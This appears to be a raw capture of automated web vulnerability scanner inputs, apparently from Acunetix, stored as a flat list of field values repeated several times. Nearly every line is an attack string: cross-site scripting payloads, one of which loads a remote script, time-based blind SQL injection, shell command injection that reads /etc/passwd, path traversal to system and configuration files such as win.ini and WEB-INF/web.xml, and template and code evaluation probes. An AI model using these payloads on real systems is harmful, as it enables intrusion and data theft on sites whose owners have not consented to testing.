1<img src=xyz OnErRor=prompt(975315)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(900892)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

-1

1<ScRiPt%20>prompt(963650)</sCripT>

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1

-1)

1

1&lt

${99119+100141}

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

\xf6<img acu onmouseover=prompt(916047) //\xf6>

1

"|"ld

1&n911815=v925507

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

rOiRCbGy'

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(943338)>

)

1

1

QzdCYu8G')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

1

'

GWlumaXs'))

'

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

[url=http://www.acunetix.com]website security[/url]

^(#$!@#$)(()))******

1

1

"

-1

1

"

/etc/passwd

1

1_PJkHD <ScRiPt >prompt(949553)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

-1))

&dir

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitaebiJn55Ha.bxss.me/

EA50csls'

1

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

IJk39s1p')

1

1

"&dir&"

http://www.acunetix.tst

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

zchenl9w'))

'"

|dir

comments

1

1

1'"()&%<ScRiPt >prompt(992706)</ScRiPt>

1

file:///etc/passwd

1

1

'|dir

<!--

comments/.

1

1

'"()&%<ScRiPt >prompt(906832)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

1

1_922673

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

acu2493\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2493

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acux1228\xc0\xbez1\xc0\xbcz2a\x90bcxuca1228

1

1<ScRiPt >prompt(921418)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(967140)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(969506)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969526></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(995963)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(980463)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943907)"></g></svg>

1

1

1<div style=width:expression(prompt(971941))>

response.write(9839004*9267614)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

'+response.write(9839004*9267614)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

"+response.write(9839004*9267614)+"

1<body onload=prompt(967939)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(914206)>

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(976598)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(903372)>

-1

1

1

${99292+100396}

`cat /etc/passwd`

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(928667)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n983238=v947727

1

|cat /etc/passwd#

1

-1))

1some_inexistent_file_with_long_name%00.jpg

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

1

'|'ld

OvpBB7c2'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

\xf6<img acu onmouseover=prompt(973218) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

"|"ld

txXgYsJm')

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(948983)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

'

^(#$!@#$)(()))******

1

1

XOo8BJv9'))

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

"

-1

1

1

1

'

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

1_3Qw6O <ScRiPt >prompt(996894)</ScRiPt>

1

http://hitjZW4JnKrif.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

1

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

b7VmkRK5'

1

&dir

1

comments

1

1

http://www.acunetix.tst

1

p5yjIOlh')

1

'"

comments

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(937027)</ScRiPt>

1

g3j1ELRR'))

'&dir&'

comments/.

<!--

1

1

'"()&%<ScRiPt >prompt(970844)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"&dir&"

1

1

1_999803

1

1

WEB-INF/web.xml

|dir

1

1

1

'|dir

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

acu2027\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2027

1

1

../../../../../../../../../../boot.ini

1

1

1

acux3998\xc0\xbez1\xc0\xbcz2a\x90bcxuca3998

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(912450)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(973765)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(998526)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969006></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(919113)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(958404)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939647)"></g></svg>

response.write(9150351*9699256)

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(920633))>

'+response.write(9150351*9699256)+'

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

"+response.write(9150351*9699256)+"

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(954838)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960118)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(938744)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

`cat /etc/passwd`

-1

1<img/src=">" onerror=alert(997587)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(978301)</sCripT>

-1)

1

1

${100405+100334}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1&n931816=v932337

1

1some_inexistent_file_with_long_name%00.jpg

1

\xf6<img acu onmouseover=prompt(904637) //\xf6>

1

5o7U5umd'

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(913811)>

tdnyLMgp')

1

1

/etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

'"()

<a href='http://www.acunetix.com'>website security</a>

'

WJMvbUR6'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

^(#$!@#$)(()))******

'

1

1

[url=http://www.acunetix.com]website security[/url]

"

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1_7yWo1 <ScRiPt >prompt(940942)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

-1)

||cat /etc/passwd

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

&dir

http://hitMyGLlU49Uv.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

xpkTH7cG'

1

file:///etc/passwd

1

1

1

'&dir&'

comments

1

/\../\../\../\../\../\../\../etc/passwd

l9A5BfnK')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

comments

'"

"&dir&"

WEB-INF/web.xml

pn2XBG2X'))

1

1

1'"()&%<ScRiPt >prompt(965179)</ScRiPt>

1

<!--

comments/.

WEB-INF\web.xml

|dir

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(979573)</ScRiPt>

../../../../../../../../../../windows/win.ini

'|dir

1

1

1

1

1

../../../../../../../../../../boot.ini

1_946381

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu3406\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3406

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux2056\xc0\xbez1\xc0\xbcz2a\x90bcxuca2056

1

1

................windowswin.ini

1<ScRiPt >prompt(940854)</ScRiPt>

1

1

1<script>prompt(910404)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(918950)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978616></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(972180)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(935091)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943054)"></g></svg>

1

1<div style=width:expression(prompt(925635))>

1

1

1

response.write(9912149*9212313)

WEB-INF/web.xml

1

1<iframe src='data:text/html

'+response.write(9912149*9212313)+'

1

&cat /etc/passwd&

1<body onload=prompt(942171)>

WEB-INF\web.xml

1

1

'&cat /etc/passwd&'

"+response.write(9912149*9212313)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948802)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(921883)>

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(916243)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

-1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1<ScRiPt%20>prompt(907274)</sCripT>

1

${99478+99656}

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n965201=v966589

1

'|'ld

\xf6<img acu onmouseover=prompt(902934) //\xf6>

Igu1LU8d'

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(944951)>

1

1

1

"|"ld

F8uYzKUR')

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

1

1

oVakpkr8'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

'"()

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

'

'

1

-1

1

/etc/passwd

1

1

1

-1)

1_f1CPN <ScRiPt >prompt(956178)</ScRiPt>

"

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

-1))

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitup0JuuVpEx.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

k5sVOeZB'

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

xrhrqDZ5')

'&dir&'

1

comments

http://www.acunetix.tst

1

1

1

'"

MGqlnYg8'))

1'"()&%<ScRiPt >prompt(936585)</ScRiPt>

"&dir&"

comments

1

1

file:///etc/passwd

1

<!--

1

1

comments/.

'"()&%<ScRiPt >prompt(910525)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

1_970305

1

1

1

1

WEB-INF/web.xml

'|dir

acu2064\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2064

WEB-INF\web.xml

1

"|dir

1

1

acux9836\xc0\xbez1\xc0\xbcz2a\x90bcxuca9836

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(985602)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(959668)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(913916)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972903></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(977762)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(983404)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989910)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(958697))>

1

1

response.write(9784906*9538300)

1

1<iframe src='data:text/html

1

'+response.write(9784906*9538300)+'

WEB-INF/web.xml

1

1<body onload=prompt(907260)>

1

1

"+response.write(9784906*9538300)+"

&cat /etc/passwd&

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943239)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(991296)>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img/src=">" onerror=alert(938128)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

${99283+99268}

1<ScRiPt%20>prompt(996757)</sCripT>

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1

1&n972207=v956152

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

-1

1

)

1

\xf6<img acu onmouseover=prompt(926701) //\xf6>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

-1)

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(915624)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

-1))

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

'"()

1

testasp.vulnweb.com

'

"|"ld

UmK9EzPL'

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

6McsteQw')

${@print(md5(acunetix_wvs_security_test))}

1

1

1_CS3Th <ScRiPt >prompt(909214)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

02qwq7Wg'))

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1

"

acunetix_wvs_invalid_filename

http://hituA0MsTb1pk.bxss.me/

1

1

1

1

1

-1)

comments

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

1

&dir

http://www.acunetix.tst

comments

-1))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(910879)</ScRiPt>

'&dir&'

comments/.

1

1

9c3Ik1pv'

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(927399)</ScRiPt>

1

"&dir&"

1

1

nNBde2jX')

WEB-INF\web.xml

1

1_964402

1

1

|dir

1

krIv7pDe'))

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

../../../../../../../../../../boot.ini

acu7739\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7739

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3116\xc0\xbez1\xc0\xbcz2a\x90bcxuca3116

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(953405)</ScRiPt>

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(937439)</script>

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(912627)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944240></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(922820)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(946594)">

1

1

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906328)"></g></svg>

1

1<div style=width:expression(prompt(981841))>

response.write(9801353*9263219)

WEB-INF\web.xml

1

1

1

'+response.write(9801353*9263219)+'

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1

../../../../../../../../../../etc/passwd

"+response.write(9801353*9263219)+"

1<body onload=prompt(928991)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916227)>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

${99610+99730}

1

1<img src=xyz OnErRor=prompt(924180)>

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(959238)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1&n948464=v969599

1

1<ScRiPt%20>prompt(928110)</sCripT>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

1

1&lt

-1)

testasp.vulnweb.com

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(928670) //\xf6>

'"()

-1))

1

/etc/passwd

1

'

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(923635)>

1

'

9svG4DDu'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

Uk740LA2')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

6c3wGfKN'))

1_Hw1pM <ScRiPt >prompt(942687)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://hit9dKS4LVJ0m.bxss.me/

&dir

-1

1

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

'&dir&'

1

1

1

comments

1

-1))

file:///etc/passwd

1

1

http://www.acunetix.tst

"&dir&"

'"

comments

1

HVYtRXbM'

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(912725)</ScRiPt>

|dir

<!--

'"()&%<ScRiPt >prompt(924392)</ScRiPt>

1

comments/.

hl3A8u6M')

1

1

WEB-INF/web.xml

'|dir

1

szmnYJ0d'))

1_977668

1

1

1

WEB-INF\web.xml

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu2521\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2521

1

../../../../../../../../../../boot.ini

1

1

1

acux4296\xc0\xbez1\xc0\xbcz2a\x90bcxuca4296

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(925494)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1<script>prompt(952147)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(932977)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915930></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(912807)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(923038)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929631)"></g></svg>

1

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(957957))>

1

response.write(9393487*9757303)

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

'+response.write(9393487*9757303)+'

1

1

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(965456)>

